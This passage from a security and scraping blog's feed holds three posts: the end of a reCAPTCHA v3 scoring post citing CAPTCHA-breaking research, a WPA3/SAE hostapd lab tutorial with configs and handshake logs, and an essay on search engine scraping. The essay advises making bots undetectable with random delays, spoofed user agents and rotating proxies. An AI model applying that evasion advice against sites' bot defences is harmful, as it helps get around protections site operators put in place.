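  // Medium score: ask for an additional proof, e.g. an email confirmation.
  if (verification.score >= thresholds.challenge) return 'challenge';
  // Low score: very likely a bot.
  return 'reject';
}

console.log(decideAction({ success: true, score: 0.9, action: 'login' }, 'login'));
console.log(decideAction({ success: true, score: 0.5, action: 'login' }, 'login'));
console.log(decideAction({ success: true, score: 0.1, action: 'login' }, 'login'));
```

<p>Keeping the thresholds configurable makes sense because the appropriate cut-off depends on the site and on the action being protected.</p>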
<h3>Sources</h3>
<ol>
<li>https://github.com/ecthros/uncaptcha2</li>
<li>Bock, Kevin, et al. "unCaptcha: a low-resource defeat of recaptcha's audio challenge." Proceedings of the 11th USENIX Conference on Offensive Technologies. USENIX Association, 2017.</li>
<li><a href="https://www.blackhat.com/docs/asia-16/materials/asia-16-Sivakorn-Im-Not-a-Human-Breaking-the-Google-reCAPTCHA-wp.pdf">I'm not a human: Breaking the Google reCAPTCHA - Black Hat</a></li>
<li><a href="https://webmasters.googleblog.com/2018/10/introducing-recaptcha-v3-new-way-to.html">Introducing reCAPTCHA v3: the new way to stop bots</a></li>
</ol>Running a WPA3 access point with hostapd 2.7 and SAE/Dragonfly2019-02-22T18:15:00+01:002020-12-31T13:15:00+01:00Nikolai Tschachertag:incolumitas.com,2019-02-22:/2019/02/22/running-a-WPA3-access-point-with-hostapd-SAE-Dragonfly/<p>Tutorial that shows how to run an WPA3 access point with hostapd 2.7 and SAE Dragonfly Handshake.</p><p>In my master thesis at HU Berlin I investigate the simultaneous authentication of equals (SAE)
protocol that is going to be used as part of the WPA3 certification. </p>
<p>In the broadest sense I will investigate the security of the new SAE authentication mechanism and the interaction
with the 4-way-handshake.</p>
<p>This handshake (also referred to as Dragonfly) brings two major advantages compared to the well known WPA/WPA2 authentication:</p>
<ol>
<li>
<p>Dragonfly/SAE is resistant against offline dictionary attacks. Guesses on the password
can only happen while interacting with the protocol in a live handshake negotiation session.</p>
</li>
<li>
<p>Dragonfly/SAE provides perfect forward secrecy. This means that an attacker cannot
decrypt traffic captured in the past, even after learning the network password in the present.</p>
</li>
</ol>
<p>Those two major advantages will be present in devices that are certified by the WPA3 certification program.
Devices that support WPA3 are already on the market and are expected to be widely adopted in the near
future.</p>
<p>In this tutorial I will explain how to set up a WPA3 network on my laptop.</p>
<p>Unfortunately I could not set up a WPA3 network that makes use of <strong><a href="https://en.wikipedia.org/wiki/IEEE_802.11w-2009">protected management frames (PMF, IEEE 802.11w)</a></strong>.</p>
<p>The reason is most likely that the device drivers do not support PMF.</p>
<p>For a WPA3 certified device, PMF are necessary, therefore the network we create in this tutorial is not a complete WPA3 certified network.</p>
<h3>Setup</h3>
<p>In my case I have Ubuntu 18.04 on my laptop and Kali Linux 2019.1 in a VMware virtual machine.</p>
<p>I have three 802.11 network devices. </p>
<ol>
<li>One integrated wireless card in my laptop: </li>
</ol>
<div class="highlight"><pre><span></span><code>$ lspci -k
02:00.0 Network controller: Intel Corporation Centrino Advanced-N 6235 (rev 24)
Subsystem: Intel Corporation Centrino Advanced-N 6235 AGN
Kernel driver in use: iwlwifi
Kernel modules: iwlwifi
</code></pre></div>
<ol start="2">
<li>
<p>The Alfa dual band AWUS036ACH USB NIC. This is the driver I used: https://github.com/aircrack-ng/rtl8812au
To install the driver, read this blog post: https://forums.hak5.org/topic/43124-alfa-awus036ach-kali-configuration-guide/
We will not use this device in this tutorial, because it caused me too much headache and trouble.</p>
</li>
<li>
<p>A Panda N600 Wireless USB adapter using a Ralink chipset</p>
</li>
</ol>
<p>I run <strong>the access point on the kali machine with hostapd version 2.7</strong>. I will use the Panda N600 Wireless USB adapter for the access point.</p>
<p>The <strong>supplicant will run on the host machine of my laptop</strong>. I will use my integrated Centrino Advanced-N 6235 AGN as the network card of the supplicant.</p>
<p>This setup means that the 802.11 network is not a mere hardware simulation: all frames are actually sent over the air!</p>
<h3>Compile Hostapd on Kali Linux 2019.1</h3>
<p>All commands are executed from within the virtual machine running Kali Linux 2019.1</p>
<p>Download and extract the latest version of hostapd:</p>
<div class="highlight"><pre><span></span><code>wget https://w1.fi/releases/hostapd-2.7.tar.gz
tar xzvf hostapd-2.7.tar.gz
<span class="nb">cd</span> hostapd-2.7/hostapd
</code></pre></div>
<p>After downloading the sources of hostapd, we need to install several packages/libraries that are necessary to compile hostapd and the supplicant.</p>
<div class="highlight"><pre><span></span><code>apt install pkg-config
apt install libnl-3-dev
apt install libssl-dev
apt install libnl-genl-3-dev
</code></pre></div>
<p>Append the following line to the end of the <strong>defconfig</strong> file:</p>
<div class="highlight"><pre><span></span><code>CONFIG_SAE=y
</code></pre></div>
<p>Then compile hostapd:</p>
<div class="highlight"><pre><span></span><code>cp defconfig .config
make -j <span class="m">2</span>
<span class="nb">cd</span> ..
</code></pre></div>
<p>Now you should have a fresh binary <strong>hostapd</strong> that is compiled to support SAE as key management.</p>
<p>You can confirm that by running</p>
<div class="highlight"><pre><span></span><code>/hostapd-2.7/hostapd$ ./hostapd -v
hostapd v2.7
User space daemon for IEEE 802.11 AP management,
IEEE 802.1X/WPA/WPA2/EAP/RADIUS Authenticator
Copyright (c) 2002-2018, Jouni Malinen &lt;j@w1.fi&gt; and contributors
</code></pre></div>
<h3>Configure Hostapd to use SAE/Dragonfly</h3>
<p>This is the configuration file (<strong>wpa3.conf</strong>) for hostapd that enables WPA3 authentication:</p>
<div class="highlight"><pre><span></span><code>interface=wlan0
ssid=WPA3-Network
hw_mode=g
channel=1
wpa=2
wpa_passphrase=abcdefgh
wpa_key_mgmt=SAE
rsn_pairwise=CCMP
#ieee80211w=2
</code></pre></div>
<p>The line <code>wpa_key_mgmt=SAE</code> is the crucial part. It tells hostapd to use SAE as key management protocol.</p>
<p>Before you start hostapd, it's necessary to kill some programs that might interfere with hostapd.</p>
<p>My <strong>/etc/NetworkManager/NetworkManager.conf</strong> looks like this:</p>
<div class="highlight"><pre><span></span><code><span class="k">[main]</span><span class="w"></span>
<span class="na">plugins</span><span class="o">=</span><span class="s">ifupdown,keyfile</span><span class="w"></span>
<span class="k">[ifupdown]</span><span class="w"></span>
<span class="na">managed</span><span class="o">=</span><span class="s">false</span><span class="w"></span>
<span class="k">[device]</span><span class="w"></span>
<span class="na">wifi.scan-rand-mac-address</span><span class="o">=</span><span class="s">no</span><span class="w"></span>
</code></pre></div>
<p>I created this script (<strong>prepare.sh</strong>) to stop the potentially interfering network-manager:</p>
<div class="highlight"><pre><span></span><code><span class="ch">#!/bin/bash</span>
<span class="k">if</span> <span class="o">[</span> -z <span class="s2">"</span><span class="nv">$1</span><span class="s2">"</span> <span class="o">]</span>
<span class="k">then</span>
<span class="nb">echo</span> <span class="s2">"please specify interface as first arg"</span><span class="p">;</span>
<span class="k">else</span>
<span class="c1"># use airmon to stop interfering processes</span>
sudo airmon-ng check <span class="nb">kill</span>
<span class="c1"># then stop network manager</span>
<span class="c1"># because airmon doesn't do a good job</span>
sudo service network-manager stop
<span class="c1"># enable hardware sim</span>
<span class="c1">#sudo modprobe mac80211_hwsim radios=3</span>
rfkill unblock wifi
<span class="c1"># Optionally kill other Wi-Fi clients the brute-force way:</span>
sudo pkill wpa_supplicant
<span class="c1"># Put the interface in monitor mode the old fashioned way</span>
<span class="c1"># Probably not necessary</span>
sudo ifconfig <span class="nv">$1</span> down
sudo iwconfig <span class="nv">$1</span> mode monitor
sudo ifconfig <span class="nv">$1</span> up
<span class="c1"># To monitor traffic in wireshark you can execute</span>
<span class="c1"># sudo ifconfig hwsim0 up</span>
<span class="k">fi</span>
</code></pre></div>
<p>Execute the script with:</p>
<div class="highlight"><pre><span></span><code>chmod +x prepare.sh
./prepare.sh wlan0
</code></pre></div>
<p>Now we can finally start hostapd with</p>
<div class="highlight"><pre><span></span><code>./hostapd wpa3.conf -dd -K
</code></pre></div>
<h3>Configure wpa_supplicant to connect to the wpa3 network</h3>
<p>These commands need to be executed on the laptop (host machine).</p>
<p>First compile wpa_supplicant similar to how we compiled hostapd:</p>
<div class="highlight"><pre><span></span><code>wget https://w1.fi/releases/wpa_supplicant-2.7.tar.gz
tar xzvf wpa_supplicant-2.7.tar.gz
<span class="nb">cd</span> wpa_supplicant-2.7/wpa_supplicant
</code></pre></div>
<p>Append <code>CONFIG_SAE=y</code> to <strong>defconfig</strong></p>
<p>Then compile it:</p>
<div class="highlight"><pre><span></span><code>cp defconfig .config
make -j <span class="m">2</span>
<span class="nb">cd</span> ..
</code></pre></div>
<p>Then save the supplicant configuration as <strong>supp.conf</strong> with the following contents:</p>
<div class="highlight"><pre><span></span><code>network={
ssid="WPA3-Network"
psk="abcdefgh"
key_mgmt=SAE
#ieee80211w=2
}
</code></pre></div>
<p>Kill all interfering processes with the following commands:</p>
<div class="highlight"><pre><span></span><code>sudo service network-manager stop
sudo pkill wpa_supplicant
</code></pre></div>
<p>Then run the supplicant with</p>
<div class="highlight"><pre><span></span><code>sudo ./wpa_supplicant -D nl80211 -i wlan0 -c supp.conf -K -dd
</code></pre></div>
<h2>Results</h2>
<p>These are the log files:</p>
<ul>
<li><a href="/data/supplicant_wpa3.log">wpa_supplicant log outputs</a></li>
<li><a href="/data/hostapd_wpa3.log">hostapd log outputs</a></li>
</ul>
<p>The interesting part is the following excerpt from the wpa_supplicant log file:</p>
<div class="highlight"><pre><span></span><code>SAE: counter = 40
SAE: pwd-seed - hexdump(len=32): af c2 76 6d e8 b7 ab c3 df da 4c 40 8d 04 a3 65 f8 03 90 2f d0 f9 ea cb 5b 41 63 6e cb 14 d3 ab
SAE: pwd-value - hexdump(len=32): d5 79 09 44 00 2f 7d ca 0e 6b 82 22 37 00 ea 43 84 c0 75 94 7e eb 40 74 c4 55 a6 62 1b 0e e8 da
Get randomness: len=32 entropy=0
Get randomness: len=32 entropy=0
Get randomness: len=32 entropy=0
SAE: own commit-scalar - hexdump(len=32): b0 d9 b4 04 38 49 44 4d 5b dd f7 ff 3d 3f 0d 4a 81 d7 bb f5 66 dc 4f cb ee 95 90 0d 9e 88 46 ef
SAE: own commit-element(x) - hexdump(len=32): ed 6b 81 c3 42 bb f1 9c 27 6f 87 98 07 37 ce cf 28 2e c0 81 75 16 e7 d0 0b db f6 de 8c 7b 26 0e
SAE: own commit-element(y) - hexdump(len=32): 90 ab e3 58 aa 19 64 12 15 2e ce bc 23 e2 10 25 3f e1 10 31 1b 1f 3d 4b 67 e1 44 25 94 c0 10 e0
EAPOL: External notification - EAP success=0
EAPOL: External notification - EAP fail=0
EAPOL: External notification - portControl=Auto
wlan0: Cancelling scan request
wlan0: SME: Trying to authenticate with 9c:ef:d5:fc:0e:a8 (SSID='WPA3-Network' freq=2412 MHz)
EAPOL: External notification - portValid=0
wlan0: State: SCANNING -> AUTHENTICATING
nl80211: Authenticate (ifindex=3)
* bssid=9c:ef:d5:fc:0e:a8
* freq=2412
* SSID - hexdump_ascii(len=12):
57 50 41 33 2d 4e 65 74 77 6f 72 6b WPA3-Network
* IEs - hexdump(len=0): [NULL]
* auth_data - hexdump(len=102): 01 00 00 00 13 00 b0 d9 b4 04 38 49 44 4d 5b dd f7 ff 3d 3f 0d 4a 81 d7 bb f5 66 dc 4f cb ee 95 90 0d 9e 88 46 ef ed 6b 81 c3 42 bb f1 9c 27 6f 87 98 07 37 ce cf 28 2e c0 81 75 16 e7 d0 0b db f6 de 8c 7b 26 0e 90 ab e3 58 aa 19 64 12 15 2e ce bc 23 e2 10 25 3f e1 10 31 1b 1f 3d 4b 67 e1 44 25 94 c0 10 e0
* Auth Type 4
nl80211: Authentication request send successfully
nl80211: Event message available
nl80211: Drv Event 19 (NL80211_CMD_NEW_STATION) received for wlan0
nl80211: New station 9c:ef:d5:fc:0e:a8
nl80211: Event message available
nl80211: Drv Event 37 (NL80211_CMD_AUTHENTICATE) received for wlan0
nl80211: MLME event 37 (NL80211_CMD_AUTHENTICATE) on wlan0(c8:f7:33:d4:5a:e9) A1=c8:f7:33:d4:5a:e9 A2=9c:ef:d5:fc:0e:a8
nl80211: MLME event frame - hexdump(len=128): b0 00 3a 01 c8 f7 33 d4 5a e9 9c ef d5 fc 0e a8 9c ef d5 fc 0e a8 e0 1a 03 00 01 00 00 00 13 00 8c d8 b9 1c d9 d4 c1 1e 9b 55 2b 1e c7 cc 15 6d d7 e1 80 c0 cd 19 10 40 4a 14 27 1d 23 51 bf 00 76 ea 86 3b b4 b6 13 2f 1e 8d ba 94 a2 85 e6 28 cf 8b 45 4b 85 ad 3d 3a a2 47 74 39 3a 4a 68 06 a4 fa 78 d9 1c de 93 94 66 af ff 76 1e 2d 4f a7 c4 40 5a 0f f4 df 1c 5d 5a 47 88 39 84 7d 52 e0
nl80211: Authenticate event
wlan0: Event AUTH (10) received
wlan0: SME: Authentication response: peer=9c:ef:d5:fc:0e:a8 auth_type=3 auth_transaction=1 status_code=0
SME: Authentication response IEs - hexdump(len=98): 13 00 8c d8 b9 1c d9 d4 c1 1e 9b 55 2b 1e c7 cc 15 6d d7 e1 80 c0 cd 19 10 40 4a 14 27 1d 23 51 bf 00 76 ea 86 3b b4 b6 13 2f 1e 8d ba 94 a2 85 e6 28 cf 8b 45 4b 85 ad 3d 3a a2 47 74 39 3a 4a 68 06 a4 fa 78 d9 1c de 93 94 66 af ff 76 1e 2d 4f a7 c4 40 5a 0f f4 df 1c 5d 5a 47 88 39 84 7d 52 e0
wlan0: SME: SAE authentication transaction 1 status code 0
wlan0: SME SAE commit
SAE: Peer commit-scalar - hexdump(len=32): 8c d8 b9 1c d9 d4 c1 1e 9b 55 2b 1e c7 cc 15 6d d7 e1 80 c0 cd 19 10 40 4a 14 27 1d 23 51 bf 00
SAE: Peer commit-element(x) - hexdump(len=32): 76 ea 86 3b b4 b6 13 2f 1e 8d ba 94 a2 85 e6 28 cf 8b 45 4b 85 ad 3d 3a a2 47 74 39 3a 4a 68 06
SAE: Peer commit-element(y) - hexdump(len=32): a4 fa 78 d9 1c de 93 94 66 af ff 76 1e 2d 4f a7 c4 40 5a 0f f4 df 1c 5d 5a 47 88 39 84 7d 52 e0
SAE: Possible elements at the end of the frame - hexdump(len=0):
SAE: k - hexdump(len=32): 58 4a a1 15 2d 2b 89 37 11 27 6c 12 36 8e 3a 6c ed a8 06 7d fd 46 d4 9f 97 76 91 7f 66 b7 5f 3e
SAE: keyseed - hexdump(len=32): 77 21 44 e0 10 2c c9 05 4c 24 5a 9a 5f fb fb d6 9d be 1c 08 4d e8 7a b1 84 d7 8e 33 73 fb 55 5a
SAE: PMKID - hexdump(len=16): 3d b2 6d 22 12 1e 05 6a f7 33 23 1e 05 0b 22 b8
SAE: KCK - hexdump(len=32): 5e b5 32 c6 88 22 ad c9 7d 43 33 e9 b9 ea 7a 94 32 40 f0 a1 ed e8 7b af 5a 58 16 af 5a ff 46 57
SAE: PMK - hexdump(len=32): d8 ee 92 4b ba ff e4 7b 2f ea 85 5f be 12 fb f2 89 38 ad 8f 92 ec 99 3d 20 2f 10 76 9f e9 1a 38
wlan0: Automatic auth_alg selection: 0x1
wlan0: Using SAE auth_alg
RSN: PMKSA cache search - network_ctx=0x5566b646f620 try_opportunistic=0 akmp=0x0
RSN: Search for BSSID 9c:ef:d5:fc:0e:a8
RSN: No PMKSA cache entry found
wlan0: RSN: using IEEE 802.11i/D9.0
wlan0: WPA: Selected cipher suites: group 16 pairwise 16 key_mgmt 1024 proto 2
wlan0: WPA: Selected mgmt group cipher 32
wlan0: WPA: clearing AP WPA IE
WPA: set AP RSN IE - hexdump(len=22): 30 14 01 00 00 0f ac 04 01 00 00 0f ac 04 01 00 00 0f ac 08 00 00
wlan0: WPA: using GTK CCMP
wlan0: WPA: using PTK CCMP
wlan0: RSN: using KEY_MGMT SAE
wlan0: WPA: not using MGMT group cipher
WPA: Set own WPA IE default - hexdump(len=22): 30 14 01 00 00 0f ac 04 01 00 00 0f ac 04 01 00 00 0f ac 08 00 00
WPA: Leave previously set WPA IE default - hexdump(len=22): 30 14 01 00 00 0f ac 04 01 00 00 0f ac 04 01 00 00 0f ac 08 00 00
RRM: Determining whether RRM can be used - device support: 0x10
RRM: No RRM in network
Added supported operating classes IE - hexdump(len=19): 3b 11 51 51 53 54 73 74 75 76 77 78 79 7a 7b 7c 7d 7e 7f
RSN: PMKSA cache search - network_ctx=0x5566b646f620 try_opportunistic=0 akmp=0x400
RSN: Search for BSSID 9c:ef:d5:fc:0e:a8
RSN: No PMKSA cache entry found
EAPOL: External notification - EAP success=0
EAPOL: External notification - EAP fail=0
EAPOL: External notification - portControl=Auto
wlan0: Cancelling scan request
wlan0: SME: Trying to authenticate with 9c:ef:d5:fc:0e:a8 (SSID='WPA3-Network' freq=2412 MHz)
EAPOL: External notification - portValid=0
wlan0: State: AUTHENTICATING -> AUTHENTICATING
nl80211: Authenticate (ifindex=3)
* bssid=9c:ef:d5:fc:0e:a8
* freq=2412
* SSID - hexdump_ascii(len=12):
57 50 41 33 2d 4e 65 74 77 6f 72 6b WPA3-Network
* IEs - hexdump(len=0): [NULL]
* auth_data - hexdump(len=38): 02 00 00 00 00 00 bd 5a c1 80 bb 5a 5c 3c c7 c0 56 ab a3 d0 8a a3 8c 58 a0 79 00 e2 17 be 3a f1 fe 47 68 c6 26 11
* Auth Type 4
nl80211: Authentication request send successfully
nl80211: Event message available
nl80211: Drv Event 20 (NL80211_CMD_DEL_STATION) received for wlan0
nl80211: Delete station 9c:ef:d5:fc:0e:a8
nl80211: Event message available
nl80211: Drv Event 19 (NL80211_CMD_NEW_STATION) received for wlan0
nl80211: New station 9c:ef:d5:fc:0e:a8
nl80211: Event message available
nl80211: Drv Event 37 (NL80211_CMD_AUTHENTICATE) received for wlan0
nl80211: MLME event 37 (NL80211_CMD_AUTHENTICATE) on wlan0(c8:f7:33:d4:5a:e9) A1=c8:f7:33:d4:5a:e9 A2=9c:ef:d5:fc:0e:a8
nl80211: MLME event frame - hexdump(len=64): b0 00 3a 01 c8 f7 33 d4 5a e9 9c ef d5 fc 0e a8 9c ef d5 fc 0e a8 f0 1a 03 00 02 00 00 00 00 00 31 f6 23 46 42 56 06 9f 8b da 5a 7b ef 66 6f 1a 43 7f 78 ce 1c 19 fb b1 c7 35 20 27 a2 72 e1 ea
nl80211: Authenticate event
wlan0: Event AUTH (10) received
wlan0: SME: Authentication response: peer=9c:ef:d5:fc:0e:a8 auth_type=3 auth_transaction=2 status_code=0
SME: Authentication response IEs - hexdump(len=34): 00 00 31 f6 23 46 42 56 06 9f 8b da 5a 7b ef 66 6f 1a 43 7f 78 ce 1c 19 fb b1 c7 35 20 27 a2 72 e1 ea
wlan0: SME: SAE authentication transaction 2 status code 0
wlan0: SME SAE confirm
SAE: peer-send-confirm 0
SME: SAE completed - setting PMK for 4-way handshake
</code></pre></div>
<p>At the end you can see the message <strong>SME: SAE completed - setting PMK for 4-way handshake</strong>.</p>
<p>This tells us that SAE was used to derive a PMK that will be used for the 4-way handshake.</p>
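<p>To see how the log lines relate to each other, the <code>auth_data</code> of the first authentication request can be split into its parts. The following is a sketch under assumptions: I read the first six bytes as three little-endian 16-bit fields (transaction sequence, status code, group id) followed by the commit scalar and the x and y coordinates of the commit element, 32 bytes each for group 19. The function name <code>parse_sae_commit</code> is made up for this example.</p>

```python
import struct

# auth_data of the first Authenticate request, copied from the log excerpt.
AUTH_DATA_HEX = (
    "01 00 00 00 13 00 "
    "b0 d9 b4 04 38 49 44 4d 5b dd f7 ff 3d 3f 0d 4a "
    "81 d7 bb f5 66 dc 4f cb ee 95 90 0d 9e 88 46 ef "
    "ed 6b 81 c3 42 bb f1 9c 27 6f 87 98 07 37 ce cf "
    "28 2e c0 81 75 16 e7 d0 0b db f6 de 8c 7b 26 0e "
    "90 ab e3 58 aa 19 64 12 15 2e ce bc 23 e2 10 25 "
    "3f e1 10 31 1b 1f 3d 4b 67 e1 44 25 94 c0 10 e0"
)


def parse_sae_commit(auth_data: bytes, coord_len: int = 32) -> dict:
    """Split an SAE commit body into its fields (assumes an ECC group)."""
    expected = 6 + 3 * coord_len
    if len(auth_data) != expected:
        raise ValueError(f"expected {expected} bytes, got {len(auth_data)}")
    # Assumed layout: three little-endian 16-bit integers at the start.
    transaction, status, group = struct.unpack_from("<HHH", auth_data, 0)
    body = auth_data[6:]
    return {
        "transaction": transaction,
        "status": status,
        "group": group,
        "scalar": body[:coord_len],
        "element_x": body[coord_len:2 * coord_len],
        "element_y": body[2 * coord_len:],
    }


commit = parse_sae_commit(bytes.fromhex(AUTH_DATA_HEX))
for name, value in commit.items():
    shown = value.hex(" ") if isinstance(value, bytes) else value
    print(f"{name}: {shown}")
```

<p>The scalar and element printed by this sketch can be compared by eye with the <code>own commit-scalar</code> and <code>own commit-element</code> lines of the log above.</p>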
<h2>Open questions</h2>
<p>Unfortunately, I could not get <code>ieee80211w=2</code> to work in my configuration.</p>
<p>The reason is probably that the drivers do not support the IEEE 802.11w amendment.</p>Scraping search engines in 20192019-02-04T18:00:00+01:002019-02-04T18:00:00+01:00Nikolai Tschachertag:incolumitas.com,2019-02-04:/2019/02/04/scraping-search-engines-in-2019/<p>Modern scraping is now mostly done with real browsers, configured to behave like real humans.</p><p>When I started developing a simple Python script in 2012, which later would become the open source software <a href="https://github.com/NikolaiT/GoogleScraper">GoogleScraper</a>, I needed to stay up to date with the latest web technology. Since then, I have developed a love-hate relationship with web scraping. On the one hand, being able to scrape websites in large quantities gives you instant access to the most up-to-date information in the world. On the other hand, web scraping is inherently an unstable business, because you are a third party and rely on the provider (such as Google or Bing). The provider can change their markup at any time, ban IP ranges at will and make your life extremely annoying.</p>
<h3>Web Crawling</h3>
<p>Search engine scraping can be considered crawling of search engines. The result is a meta search engine. Search engines themselves are huge web scrapers. But instead of scraping, they call the process <em>web crawling</em>. There are many open source web crawlers such as <a href="http://nutch.apache.org/">Apache Nutch</a> or the <a href="http://stormcrawler.net">Storm Crawler</a>. They are all capable of indexing a complete website by recursively following all the links encountered during the crawling process. Usually, those programs respect the crawling policy defined in the site's <code>robots.txt</code> file and try to avoid being a heavy burden on the crawled site.</p>
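<p>How a crawler might honor <code>robots.txt</code> can be sketched with Python's standard library. The rules, the bot name <code>ExampleBot</code> and the URLs below are invented for illustration; a real crawler would download the file from the target site first.</p>

```python
from urllib.robotparser import RobotFileParser

# Invented example rules; normally fetched from https://<site>/robots.txt
ROBOTS_TXT = """\
User-agent: *
Disallow: /private/
Crawl-delay: 5
"""


def build_parser(robots_txt: str) -> RobotFileParser:
    """Create a parser from the text of a robots.txt file."""
    parser = RobotFileParser()
    parser.parse(robots_txt.splitlines())
    return parser


parser = build_parser(ROBOTS_TXT)
for url in ("https://example.com/index.html",
            "https://example.com/private/data.html"):
    print(url, "allowed:", parser.can_fetch("ExampleBot", url))
print("crawl delay in seconds:", parser.crawl_delay("ExampleBot"))
```

<p>A polite crawler would skip every URL for which <code>can_fetch</code> returns <code>False</code> and wait at least the crawl delay between two requests to the same host.</p>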
<p>If you as an individual (or as a small company) are seriously interested in deploying your own crawler for many millions of URLs, you should realize that you are dealing with Big Data problems. This almost instantly means a whole new programming paradigm, the <a href="https://en.wikipedia.org/wiki/MapReduce">MapReduce programming model</a>, and involves coordinating resources distributed across potentially many different machines. This is expensive and the learning curve is steep. Even though I have a computer science degree (M. Sc.), I would not start such a project without precisely specifying its goals and steps and considering the possibility that it will be too hard or too expensive for a small team (pessimistic view). Additionally, such projects almost always involve spending money on hardware infrastructure (such as Amazon EC2 instances) to launch your crawl.</p>
<p>Therefore, it is advisable to start a project that depends on web crawling by analyzing the <a href="http://commoncrawl.org/">CommonCrawl</a> project beforehand. They have been crawling the web for about 10 years and make their crawling corpus available for free. This enables you to bootstrap your project idea and go right to the step where you determine whether your business idea is still valid with real world data.</p>
<p>Then there is for example <a href="https://scrapy.org/">scrapy</a>, a large and well maintained scraping/crawling library written in Python. Scrapy is a mix between a crawler and a scraping framework. It abstracts the whole crawling process into a powerful framework. For example, Scrapy has a downloader middleware that allows you to plug in random proxy selection mechanisms in order to anonymize the individual requests to the target site.</p>
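<p>A random proxy selection could look roughly like the following downloader middleware. Treat it as a sketch: the class name <code>RandomProxyMiddleware</code> and the setting name <code>PROXY_LIST</code> are my own inventions, and the code relies on Scrapy's built-in proxy support picking up <code>request.meta["proxy"]</code>. The class itself does not import Scrapy, so it can be tried out without installing it.</p>

```python
import random


class RandomProxyMiddleware:
    """Downloader middleware sketch: pick a random proxy for each request."""

    def __init__(self, proxies):
        if not proxies:
            raise ValueError("at least one proxy URL is required")
        self.proxies = list(proxies)

    @classmethod
    def from_crawler(cls, crawler):
        # PROXY_LIST is a hypothetical setting name chosen for this example.
        return cls(crawler.settings.getlist("PROXY_LIST"))

    def process_request(self, request, spider):
        # The proxy is read from request.meta["proxy"] when the request is sent.
        request.meta["proxy"] = random.choice(self.proxies)
        return None  # continue with the normal download process
```

<p>To use such a middleware, it would have to be registered in the project's <code>DOWNLOADER_MIDDLEWARES</code> setting, and the proxy URLs would have to be provided in the settings as well.</p>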
<h3>Port Scanning</h3>
<p>Then there are other amazing open source programs such as <a href="https://zmap.io/">ZMap</a> or <a href="https://github.com/robertdavidgraham/masscan">Masscan</a> which allow you to port scan the entire internet within hours (yes, all <code>2^32</code> IPv4 addresses). Those port scanners can be considered crawlers for lower level TCP/IP protocols. Maybe your business idea is to create a low level meta search engine that answers queries such as:</p>
<ul>
<li>How many hosts with open port 80 have nginx version X installed?</li>
<li>What percentage of real world TLS/SSL implementations use the elliptic curve <code>NIST P-256</code>?</li>
<li>How many webservers have a <code>phpinfo.php</code> lying around in the root of the webserver?</li>
</ul>
<p>To answer these questions, you need to port scan a significant subset of the complete Internet.</p>
<p>Those questions are, for example, extremely interesting for security researchers (as well as blackhat hackers).</p>
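<p>Whether "within hours" is plausible can be checked with a little arithmetic. The sketch below simply divides the size of the IPv4 address space by a probe rate. The rates are assumptions picked for illustration, not measurements of ZMap or Masscan, and the estimate ignores reserved address ranges that a real scan would skip.</p>

```python
IPV4_ADDRESS_SPACE = 2 ** 32  # 4,294,967,296 addresses


def scan_duration_seconds(probes_per_second: float, ports: int = 1) -> float:
    """Time needed to send one probe per port to every IPv4 address."""
    if probes_per_second <= 0:
        raise ValueError("probes_per_second must be positive")
    return IPV4_ADDRESS_SPACE * ports / probes_per_second


# Hypothetical probe rates, from a modest uplink to a fast one.
for rate in (10_000, 100_000, 1_000_000):
    hours = scan_duration_seconds(rate) / 3600
    print(f"{rate:>9} probes/s -> {hours:7.1f} hours")
```

<p>The point of the calculation is that the duration scales linearly with the probe rate, so the available bandwidth decides whether a full scan takes hours or days.</p>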
<h3>Scraping Search Engines</h3>
<p>In the case of <a href="https://scrapeulous.com/">scrapeulous.com</a>, we have specialized in scraping a representative set of search engines such as Google, Bing, Duckduckgo and others.</p>
<p>In our opinion, it is actually a shame that such a small number of companies (Google, Facebook, Twitter, Microsoft) almost completely monopolize the whole Internet.</p>
<p>They can determine which user (by IP) from which region (Geo Location) will see what content of their services. They can determine the usage limits of viewing their pages.</p>
<p>And they are only interested in human users of course. They don't want to feed bots with information that costs them valuable resources.</p>
<p>The interest in real human beings is of course understandable. Real human beings can make purchase decisions, are easily influenced by advertisements and produce valuable data.</p>
<p>This is exactly the motivation for scraping search engines.</p>
<p>We at <a href="https://scrapeulous.com/">scrapeulous.com</a> strive to imitate real human search behavior as closely as possible. For this reason, we follow these guidelines that constitute <strong>best practices in modern web scraping from 2019</strong>:</p>
<ol>
<li>
<p>The customer must be able to launch a scrape job over many keywords (quantity).</p>
</li>
<li>
<p>The region from where the searches originate should be consistent. This means that a scrape job should have the same IP address from the same geographical region/country.</p>
</li>
<li>
<p>Scraping should be done by launching real browsers. For example, <a href="https://scrapeulous.com/">scrapeulous.com</a> uses the well maintained browser automation library <a href="https://github.com/GoogleChrome/puppeteer">puppeteer</a>.</p>
</li>
<li>
<p>It should be impossible to detect that the search originated from a bot. This is achieved by randomizing requests with delays, valid user agents and following guidelines such as the one <a href="https://intoli.com/blog/not-possible-to-block-chrome-headless/">published here</a>.</p>
</li>
</ol>
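<p>The randomization mentioned in the last guideline can be sketched independently of any browser automation library. The following is an assumption-laden illustration, not how scrapeulous.com is implemented: the user agent strings are merely examples, the delay bounds are arbitrary, and <code>plan_scrape_job</code> is a made-up helper. It keeps one user agent per job (so the job looks like a single consistent visitor) and draws a random pause before each keyword.</p>

```python
import random

# Example user agent strings; a real setup would maintain a current list.
USER_AGENTS = [
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
    "(KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36",
    "Mozilla/5.0 (X11; Linux x86_64; rv:65.0) Gecko/20100101 Firefox/65.0",
]


def plan_scrape_job(keywords, min_delay=2.0, max_delay=8.0, seed=None):
    """Return one user agent for the job and a random delay per keyword."""
    if min_delay < 0 or max_delay < min_delay:
        raise ValueError("need 0 <= min_delay <= max_delay")
    rng = random.Random(seed)
    user_agent = rng.choice(USER_AGENTS)
    steps = [
        {"keyword": keyword, "delay_seconds": rng.uniform(min_delay, max_delay)}
        for keyword in keywords
    ]
    return {"user_agent": user_agent, "steps": steps}


job = plan_scrape_job(["wpa3 sae", "common crawl", "puppeteer"], seed=42)
print(job["user_agent"])
for step in job["steps"]:
    print(f"wait {step['delay_seconds']:.1f}s, then search {step['keyword']!r}")
```

<p>The actual searches would then be carried out by a real browser that sleeps for the planned delay before each query.</p>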
<h3>Use cases of search engine scraping</h3>
<p>Honestly, using a service such as <a href="https://scrapeulous.com/">scrapeulous.com</a> is motivated by the same reasons why we use search engines like Google in our everyday life. The only difference is that <a href="https://scrapeulous.com/">scrapeulous.com</a> allows you to search in large quantities.</p>
<p>The most prominent use cases are the following:</p>
<ul>
<li>
<p>Scientists need data, and usually they need a lot of data for empirical studies. Searching 10k keywords manually will take you several days.</p>
</li>
